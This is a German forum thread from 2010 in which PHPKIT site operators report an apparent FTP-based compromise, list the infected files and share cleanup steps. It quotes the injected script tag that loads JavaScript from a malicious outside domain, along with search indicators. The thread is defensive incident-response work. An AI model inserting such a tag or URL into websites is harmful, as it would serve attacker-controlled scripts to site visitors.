Angriff auf versch. Webseiten (via FTP)
Viele PHPKIT-Seiten gehen seid gestern oder heute nicht, im Quelltext & in der pkinc/func/default.php findet man bei den betroffenen, die mein ICQ zum dauer glühen bringen ein JS von chubby**ondebabes. Das PHPKIT Wiki auch betroffen.
Auffallen tut es auch auf Seiten wie BurnerFM, da die Startseite durch dem Script nicht mehr valid ist.
Also, weiß einer einen guten Rat?
Betroffene Dateien:
pkinc/func/default.php
index.php
jquery.jqDock.js <-- Gibt es eigentlich nicht
dock.css <-- gibt es eigentlich nicht
Auffallen tut es auch auf Seiten wie BurnerFM, da die Startseite durch dem Script nicht mehr valid ist.
Also, weiß einer einen guten Rat?
Betroffene Dateien:
pkinc/func/default.php
index.php
jquery.jqDock.js <-- Gibt es eigentlich nicht
dock.css <-- gibt es eigentlich nicht
Es geht nicht darum zu haben was man will, sondern zu schätzen was man hat!
Blutrausch HP
Mauern sind auch nur Steine & Wassertropen können auch mal Wassermengen werden!
Blutrausch HP
Mauern sind auch nur Steine & Wassertropen können auch mal Wassermengen werden!
Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von »Muetze« (15. Juni 2010, 09:44)
Habe bis jetzt 7 betroffene Seiten gezähl, die ich an der Strippe haben, haben alle die aktuelle Build von PHPKIT & aktuelle Version von PKSM, ich habe auch ein Kit Lokal bekommen & konnte den Schädling bis jetzt in folgenden Dateien fest stellen (jede index ist quasi dabei):
Hier klicken für weitere Informationen
index.php
pkinc/func/default.php
jquery.jqDock.js <-- gibt es eigentlich nicht
dock.css <-- gibt es eigentlich nicht
pkinc\pkinc\admin\index.php (1 hits)
pkinc\pkinc\admin\main.php (1 hits)
pkinc\pkinc\admintpl\cleanup\index.php (1 hits)
pkinc\pkinc\admintpl\content\index.php (1 hits)
pkinc\pkinc\admintpl\faq\index.php (1 hits)
pkinc\pkinc\admintpl\forum\index.php (1 hits)
pkinc\pkinc\admintpl\forumatt\index.php (1 hits)
pkinc\pkinc\admintpl\hidden_hack\index.php (1 hits)
pkinc\pkinc\admintpl\index.php (1 hits)
pkinc\pkinc\admintpl\ks_addons\keps\index.php (1 hits)
pkinc\pkinc\admintpl\laberecke\index.php (1 hits)
pkinc\pkinc\admintpl\main.htm (1 hits)
pkinc\pkinc\admintpl\main_installwarning.htm (1 hits)
pkinc\pkinc\admintpl\main_installwarning_error.htm (1 hits)
pkinc\pkinc\admintpl\main_newestcontent.htm (1 hits)
pkinc\pkinc\admintpl\main_newestuser.htm (1 hits)
pkinc\pkinc\admintpl\main_noaccess.htm (1 hits)
pkinc\pkinc\admintpl\main_offline_warning.htm (1 hits)
pkinc\pkinc\admintpl\movie\index.php (1 hits)
pkinc\pkinc\admintpl\vote\index.php (1 hits)
pkinc\pkinc\admintpl\war\index.php (1 hits)
pkinc\pkinc\cfg\index.php (1 hits)
pkinc\pkinc\class\index.php (1 hits)
pkinc\pkinc\func\index.php (1 hits)
pkinc\pkinc\html\default\default.php (1 hits)
pkinc\pkinc\html\default\index.php (1 hits)
pkinc\pkinc\html\index.php (1 hits)
pkinc\pkinc\index.php (1 hits)
pkinc\pkinc\laberecke\index.php (1 hits)
pkinc\pkinc\lang\de\default.php (1 hits)
pkinc\pkinc\lang\de\index.php (1 hits)
pkinc\pkinc\lang\index.php (1 hits)
pkinc\pkinc\lang\laber_de\index.php (1 hits)
pkinc\pkinc\lang\laber_en\index.php (1 hits)
pkinc\pkinc\lang\member_de\index.php (1 hits)
pkinc\pkinc\lang\member_en\index.php (1 hits)
pkinc\pkinc\lang\war_de\index.php (1 hits)
pkinc\pkinc\lang\war_en\index.php (1 hits)
pkinc\pkinc\main.php (1 hits)
pkinc\pkinc\memberliste\index.php (1 hits)
pkinc\pkinc\public\index.php (1 hits)
pkinc\pkinc\public\streamvideos\index.php (1 hits)
pkinc\pkinc\publicinc\index.php (1 hits)
pkinc\pkinc\publicinc\ks_addons\keps\index.php (1 hits)
pkinc\pkinc\publicinc\ks_spiele\ks_gamemenu\admin\index.php (1 hits)
pkinc\pkinc\publicinc\ks_spiele\ks_gamemenu\index.php (1 hits)
pkinc\pkinc\publictpl\aclist\index.php (1 hits)
pkinc\pkinc\publictpl\content\index.php (1 hits)
pkinc\pkinc\publictpl\faq\index.php (1 hits)
pkinc\pkinc\publictpl\forum\index.php (1 hits)
pkinc\pkinc\publictpl\forum\main.htm (1 hits)
pkinc\pkinc\publictpl\forum\main_mod_col.htm (1 hits)
pkinc\pkinc\publictpl\forum\main_mod_col2.htm (1 hits)
pkinc\pkinc\publictpl\forum\main_row.htm (1 hits)
pkinc\pkinc\publictpl\forum\main_row_autor.htm (1 hit)
pkinc\pkinc\publictpl\forum\main_row_description.htm (1 hits)
pkinc\pkinc\publictpl\forum\main_row_guestautor.htm (1 hits)
pkinc\pkinc\publictpl\forum\main_thread_empty.htm (1 hits)
pkinc\pkinc\publictpl\forum\main_thread_link.htm (1 hits)
pkinc\pkinc\publictpl\guestbook\index.php (1 hits)
pkinc\pkinc\publictpl\hidden_hack\index.php (1 hits)
pkinc\pkinc\publictpl\index.php (1 hits)
pkinc\pkinc\publictpl\kitcasino\index.php (1 hits)
pkinc\pkinc\publictpl\laberecke\index.htm (1 hits)
pkinc\pkinc\publictpl\laberecke\index.php (1 hits)
pkinc\pkinc\publictpl\laberecke\index_scroll.htm (1 hits)
pkinc\pkinc\publictpl\movie\index.php (1 hits)
pkinc\pkinc\publictpl\navigation\extnbst\index.php (1 hits)
pkinc\pkinc\publictpl\navigation\index.php (1 hits)
pkinc\pkinc\publictpl\stats\index.php (1 hits)
pkinc\pkinc\publictpl\vote\index.php (1 hits)
pkinc\pkinc\publictpl\war\index.php (1 hits)
pkinc\pkinc\publictpl\ymc\index.php (1 hits)
pkinc\pkinc\rep\design\index.php (1 hits)
pkinc\pkinc\rep\gdfx\captcha\index.php (1 hits)
pkinc\pkinc\rep\gdfx\fonts\index.php (1 hits)
pkinc\pkinc\rep\gdfx\index.php (1 hits)
pkinc\pkinc\rep\index.php (1 hits)
pkinc\pkinc\setup\index.php (1 hits)
pkinc\pkinc\setup\tpl\index.php (1 hits)
pkinc\pkinc\war\index.php (1 hits)
pkinc/func/default.php
jquery.jqDock.js <-- gibt es eigentlich nicht
dock.css <-- gibt es eigentlich nicht
pkinc\pkinc\admin\index.php (1 hits)
pkinc\pkinc\admin\main.php (1 hits)
pkinc\pkinc\admintpl\cleanup\index.php (1 hits)
pkinc\pkinc\admintpl\content\index.php (1 hits)
pkinc\pkinc\admintpl\faq\index.php (1 hits)
pkinc\pkinc\admintpl\forum\index.php (1 hits)
pkinc\pkinc\admintpl\forumatt\index.php (1 hits)
pkinc\pkinc\admintpl\hidden_hack\index.php (1 hits)
pkinc\pkinc\admintpl\index.php (1 hits)
pkinc\pkinc\admintpl\ks_addons\keps\index.php (1 hits)
pkinc\pkinc\admintpl\laberecke\index.php (1 hits)
pkinc\pkinc\admintpl\main.htm (1 hits)
pkinc\pkinc\admintpl\main_installwarning.htm (1 hits)
pkinc\pkinc\admintpl\main_installwarning_error.htm (1 hits)
pkinc\pkinc\admintpl\main_newestcontent.htm (1 hits)
pkinc\pkinc\admintpl\main_newestuser.htm (1 hits)
pkinc\pkinc\admintpl\main_noaccess.htm (1 hits)
pkinc\pkinc\admintpl\main_offline_warning.htm (1 hits)
pkinc\pkinc\admintpl\movie\index.php (1 hits)
pkinc\pkinc\admintpl\vote\index.php (1 hits)
pkinc\pkinc\admintpl\war\index.php (1 hits)
pkinc\pkinc\cfg\index.php (1 hits)
pkinc\pkinc\class\index.php (1 hits)
pkinc\pkinc\func\index.php (1 hits)
pkinc\pkinc\html\default\default.php (1 hits)
pkinc\pkinc\html\default\index.php (1 hits)
pkinc\pkinc\html\index.php (1 hits)
pkinc\pkinc\index.php (1 hits)
pkinc\pkinc\laberecke\index.php (1 hits)
pkinc\pkinc\lang\de\default.php (1 hits)
pkinc\pkinc\lang\de\index.php (1 hits)
pkinc\pkinc\lang\index.php (1 hits)
pkinc\pkinc\lang\laber_de\index.php (1 hits)
pkinc\pkinc\lang\laber_en\index.php (1 hits)
pkinc\pkinc\lang\member_de\index.php (1 hits)
pkinc\pkinc\lang\member_en\index.php (1 hits)
pkinc\pkinc\lang\war_de\index.php (1 hits)
pkinc\pkinc\lang\war_en\index.php (1 hits)
pkinc\pkinc\main.php (1 hits)
pkinc\pkinc\memberliste\index.php (1 hits)
pkinc\pkinc\public\index.php (1 hits)
pkinc\pkinc\public\streamvideos\index.php (1 hits)
pkinc\pkinc\publicinc\index.php (1 hits)
pkinc\pkinc\publicinc\ks_addons\keps\index.php (1 hits)
pkinc\pkinc\publicinc\ks_spiele\ks_gamemenu\admin\index.php (1 hits)
pkinc\pkinc\publicinc\ks_spiele\ks_gamemenu\index.php (1 hits)
pkinc\pkinc\publictpl\aclist\index.php (1 hits)
pkinc\pkinc\publictpl\content\index.php (1 hits)
pkinc\pkinc\publictpl\faq\index.php (1 hits)
pkinc\pkinc\publictpl\forum\index.php (1 hits)
pkinc\pkinc\publictpl\forum\main.htm (1 hits)
pkinc\pkinc\publictpl\forum\main_mod_col.htm (1 hits)
pkinc\pkinc\publictpl\forum\main_mod_col2.htm (1 hits)
pkinc\pkinc\publictpl\forum\main_row.htm (1 hits)
pkinc\pkinc\publictpl\forum\main_row_autor.htm (1 hit)
pkinc\pkinc\publictpl\forum\main_row_description.htm (1 hits)
pkinc\pkinc\publictpl\forum\main_row_guestautor.htm (1 hits)
pkinc\pkinc\publictpl\forum\main_thread_empty.htm (1 hits)
pkinc\pkinc\publictpl\forum\main_thread_link.htm (1 hits)
pkinc\pkinc\publictpl\guestbook\index.php (1 hits)
pkinc\pkinc\publictpl\hidden_hack\index.php (1 hits)
pkinc\pkinc\publictpl\index.php (1 hits)
pkinc\pkinc\publictpl\kitcasino\index.php (1 hits)
pkinc\pkinc\publictpl\laberecke\index.htm (1 hits)
pkinc\pkinc\publictpl\laberecke\index.php (1 hits)
pkinc\pkinc\publictpl\laberecke\index_scroll.htm (1 hits)
pkinc\pkinc\publictpl\movie\index.php (1 hits)
pkinc\pkinc\publictpl\navigation\extnbst\index.php (1 hits)
pkinc\pkinc\publictpl\navigation\index.php (1 hits)
pkinc\pkinc\publictpl\stats\index.php (1 hits)
pkinc\pkinc\publictpl\vote\index.php (1 hits)
pkinc\pkinc\publictpl\war\index.php (1 hits)
pkinc\pkinc\publictpl\ymc\index.php (1 hits)
pkinc\pkinc\rep\design\index.php (1 hits)
pkinc\pkinc\rep\gdfx\captcha\index.php (1 hits)
pkinc\pkinc\rep\gdfx\fonts\index.php (1 hits)
pkinc\pkinc\rep\gdfx\index.php (1 hits)
pkinc\pkinc\rep\index.php (1 hits)
pkinc\pkinc\setup\index.php (1 hits)
pkinc\pkinc\setup\tpl\index.php (1 hits)
pkinc\pkinc\war\index.php (1 hits)
Es geht nicht darum zu haben was man will, sondern zu schätzen was man hat!
Blutrausch HP
Mauern sind auch nur Steine & Wassertropen können auch mal Wassermengen werden!
Blutrausch HP
Mauern sind auch nur Steine & Wassertropen können auch mal Wassermengen werden!
Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »Muetze« (15. Juni 2010, 10:08)
dies hier ist der schädling: http://inc.chubbyblondebabes.com/HDTV.js
aber was der genau macht ist ne gute frage
edit: hab grad mal in die js geschaut, die ist komplett leer
aber was der genau macht ist ne gute frage
edit: hab grad mal in die js geschaut, die ist komplett leer
Ja, kann auch ein anderes JS sein, einfach nach chubbyblondebabes suchen.
Ich jage es gerade es gerade durch base64, strrev, urldecode usw & suche weiter, obwohl ich glaube da nix mehr finden werde so.
Wir sind wie folgt vorgegangen jetzt:
- ALLE Dateien runter vom FTP (er hatte sich auch in Anwendungen wie MySQL Dumper eingeschrieben)
- Mit Notepadd++ (kostenlos) -> Suchen -> In Dateien suchen -> Suchen nach: <script type="text/javascript" src="http://inc.chubbyblondebabes.com/xyz.js"></script> - Ersetzen druch '{nix}' - Ersetzen in Dateien
- Danach nochmal nach chubbyblondebabes suchen in Dateien (Alle suchen)
- Darauf achten das keine Dateien mehr da sind, die eigentlich nicht auf dem FTP gehören (wie jquery.jqDock.js oder dock.css)
Neben der Suche nach dem Script ist meistens noch eine auskommentierte Kombination aus Ziffern & Buchstaben darunter <!--xyxsrferdhju->>
Bei der Suche darauf achten das im Feld Filter *.* steht, damit alle Dateien durchsucht werden, bei schwächeren Rechner am besten nicht Alles auf einmal durchsuchen & nicht wundern: Notepad++ reagiert während der Suche nicht, einfach abwarten am Besten.
Datenbank wurde noch nicht überprüft!
Ich jage es gerade es gerade durch base64, strrev, urldecode usw & suche weiter, obwohl ich glaube da nix mehr finden werde so.
Wir sind wie folgt vorgegangen jetzt:
- ALLE Dateien runter vom FTP (er hatte sich auch in Anwendungen wie MySQL Dumper eingeschrieben)
- Mit Notepadd++ (kostenlos) -> Suchen -> In Dateien suchen -> Suchen nach: <script type="text/javascript" src="http://inc.chubbyblondebabes.com/xyz.js"></script> - Ersetzen druch '{nix}' - Ersetzen in Dateien
- Danach nochmal nach chubbyblondebabes suchen in Dateien (Alle suchen)
- Darauf achten das keine Dateien mehr da sind, die eigentlich nicht auf dem FTP gehören (wie jquery.jqDock.js oder dock.css)
Neben der Suche nach dem Script ist meistens noch eine auskommentierte Kombination aus Ziffern & Buchstaben darunter <!--xyxsrferdhju->>
Bei der Suche darauf achten das im Feld Filter *.* steht, damit alle Dateien durchsucht werden, bei schwächeren Rechner am besten nicht Alles auf einmal durchsuchen & nicht wundern: Notepad++ reagiert während der Suche nicht, einfach abwarten am Besten.
Datenbank wurde noch nicht überprüft!
Es geht nicht darum zu haben was man will, sondern zu schätzen was man hat!
Blutrausch HP
Mauern sind auch nur Steine & Wassertropen können auch mal Wassermengen werden!
Blutrausch HP
Mauern sind auch nur Steine & Wassertropen können auch mal Wassermengen werden!
Dieser Beitrag wurde bereits 7 mal editiert, zuletzt von »Muetze« (22. Juni 2010, 14:37)
Die war aber voher nicht leer. Ich denke das die Jungs auch nicht schlafen!dies hier ist der schädling: http://inc.chubbyblondebabes.com/HDTV.js
aber was der genau macht ist ne gute frage
edit: hab grad mal in die js geschaut, die ist komplett leer ?( 8|
Die war aber voher nicht leer. Ich denke das die Jungs auch nicht schlafen!dies hier ist der schädling: http://inc.chubbyblondebabes.com/HDTV.js
aber was der genau macht ist ne gute frage
edit: hab grad mal in die js geschaut, die ist komplett leer![]()
![]()
Richtig, die nennen sich auch oft anders, die Seite die ich gerade gesucht hatte, hieß es GUI.js
Was auffällt ist, dass das Script auf jeder Seite mal sich mehr & auf anderen wieder weniger eingeschrieben hat.
Anderes Script: Suchbegriff: owensomebody
Es geht nicht darum zu haben was man will, sondern zu schätzen was man hat!
Blutrausch HP
Mauern sind auch nur Steine & Wassertropen können auch mal Wassermengen werden!
Blutrausch HP
Mauern sind auch nur Steine & Wassertropen können auch mal Wassermengen werden!
Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »Muetze« (15. Juni 2010, 11:01)
Hallo zusammen,
um überhaupt etwas dazu sagen zu können brauche ich die Logs der betroffenen Seiten aus dem betroffenen Zeitraum.
@ Muetze:
Du sagtest das Wiki war auch betroffen - aber das System ist doch gar nicht PHPKIT - oder war es ein Testkit?
Grüße
um überhaupt etwas dazu sagen zu können brauche ich die Logs der betroffenen Seiten aus dem betroffenen Zeitraum.
@ Muetze:
Du sagtest das Wiki war auch betroffen - aber das System ist doch gar nicht PHPKIT - oder war es ein Testkit?
Grüße
So einfach wie möglich - aber nicht einfacher!
Albert Einstein (1879-1955)
Albert Einstein (1879-1955)
Boar ey !!!
Net nur jede index.php sondern bei mir isses sogar jede js Datei in dem mit document_write reingeschrieben wird.
Bin grad am säubern.
@Headless wenn du willst schicke ich dir Account Daten für den PKSM LOG dann kannste bei mir schauen.
Net nur jede index.php sondern bei mir isses sogar jede js Datei in dem mit document_write reingeschrieben wird.
Bin grad am säubern.
@Headless wenn du willst schicke ich dir Account Daten für den PKSM LOG dann kannste bei mir schauen.
Seit 02.07.2010 Papa einer süssen Tocher !!!!
http://www.burnerfm.de
Mit den besten Hits der 80´s, 90´s und von heute. Plus einigen PHPKit Addons... uvm.
Mit den besten Hits der 80´s, 90´s und von heute. Plus einigen PHPKit Addons... uvm.
Ähnliche Themen
-
Aktuelle Version [1.6.5] »-
1.6.5 Probleme mit pksm
(5. März 2010, 07:15)
-
pkSM Support »-
1.6.5 User hat Fehlermeldung beim schreiben !
(25. Januar 2010, 13:13)
-
pkSM Support »-
1.6.03 pkSec.Modul NavBox Counter zeigt immer null
(15. Oktober 2008, 23:31)
-
pkSM Support »-
Stand Alone pkSM auch für anderes CMS?
(3. März 2009, 12:10)


